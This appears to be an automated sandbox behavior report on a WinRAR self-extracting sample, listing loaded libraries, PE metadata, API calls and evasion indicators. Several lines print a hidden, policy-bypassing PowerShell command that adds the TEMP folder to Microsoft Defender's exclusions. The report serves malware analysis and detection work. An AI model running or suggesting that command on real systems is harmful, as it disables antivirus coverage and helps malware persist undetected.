Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mmc.exeWindow found: window name: msctls_updown32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: IPt9U27NoX.exeStatic PE information: certificate valid
Source: IPt9U27NoX.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: IPt9U27NoX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IPt9U27NoX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IPt9U27NoX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IPt9U27NoX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IPt9U27NoX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IPt9U27NoX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IPt9U27NoX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: IPt9U27NoX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: IPt9U27NoX.exe
Source: IPt9U27NoX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IPt9U27NoX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IPt9U27NoX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IPt9U27NoX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IPt9U27NoX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Windows\System32\mmc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}
Source: C:\Windows\System32\mmc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6497265Jump to behavior
Source: IPt9U27NoX.exeStatic PE information: section name: .didat
Source: IPt9U27NoX.exeStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A45156 push rsi; retf 0_2_00007FF752A45157
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A45166 push rsi; retf 0_2_00007FF752A45167
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB97F7D2A5 pushad ; iretd 2_2_00007FFB97F7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB981630D3 pushad ; iretd 2_2_00007FFB98163332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB98162316 push 8B485F92h; iretd 2_2_00007FFB9816231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB9816797D push 56EBC38Dh; ret 2_2_00007FFB98167A02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB98162E11 push esp; iretd 2_2_00007FFB981630D2

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeMemory allocated: 4AB0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\mmc.exeMemory allocated: 5140000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\mmc.exeMemory allocated: 5200000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\mmc.exeMemory allocated: 5250000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\mmc.exeMemory allocated: 54B0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 9873Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7038Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2756Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-27060
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1852Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4784Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A2B190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF752A2B190
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A140BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF752A140BC
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A3FCA0 FindFirstFileExA,0_2_00007FF752A3FCA0
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A316A4 VirtualQuery,GetSystemInfo,0_2_00007FF752A316A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mmc.exe, 00000001.00000002.2760018003.0000000003017000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000001.00000002.2760018003.000000000306D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A33170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF752A33170
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A40D20 GetProcessHeap,0_2_00007FF752A40D20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A33354 SetUnhandledExceptionFilter,0_2_00007FF752A33354
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A32510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF752A32510
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A33170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF752A33170
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A376D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF752A376D8

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\mmc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}
Source: C:\Windows\System32\mmc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}Jump to behavior
Source: C:\Windows\System32\mmc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}
